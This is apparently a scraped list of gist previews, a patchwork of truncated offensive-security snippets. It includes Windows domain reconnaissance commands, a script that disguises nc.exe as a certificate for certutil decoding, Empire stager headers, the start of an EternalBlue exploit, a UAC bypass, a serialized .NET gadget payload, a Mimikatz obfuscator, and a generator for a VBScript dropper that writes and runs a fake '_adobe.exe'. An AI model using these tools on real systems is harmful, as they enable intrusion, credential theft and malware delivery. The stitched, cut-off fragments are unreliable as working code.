echo %LOGONSERVER%
net view /DOMAIN:domain
#!/bin/bash | |
# drop_binary.sh | |
# ./drop_binary.sh /usr/share/windows-binaries/nc.exe nc.txt | |
# certutil -decode encoded.txt decoded.bin | |
echo "-----BEGIN CERTIFICATE-----" > $2 | |
cat $1 | base64 >> $2 | |
echo "-----END CERTIFICATE-----" >> $2 | |
sed -i 's/^/echo /g' $2 && sed -i 's/$/ >> encoded.txt/g' $2 |
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'JS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
#!/usr/bin/python | |
# This file has no update anymore. Please see https://github.com/worawit/MS17-010 | |
from impacket import smb | |
from struct import pack | |
import sys | |
import socket | |
''' | |
EternalBlue exploit for Windows 7/2008 by sleepya | |
The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
using System; | |
using System.Linq; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
using Microsoft.Win32; | |
/* | |
InstallUtil.exe C# version of Event Viewer UAC bypass |
var serialized_obj = [ | |
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
from lib.common import helpers | |
class Stager: | |
def __init__(self, mainMenu, params=[]): | |
self.info = { | |
'Name': 'VBS Launcher StarFighter', | |
'Author': ['Cn33liz'], |
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
#!/bin/bash | |
if [[ $# -le 1 ]] ; then | |
echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1' | |
exit 1 | |
fi | |
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} | |
cp $1 $2 |
#!/bin/bash | |
convert2hex=$(xxd -p $1) | |
result=$(echo $convert2hex | sed s'/ //g') | |
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)' |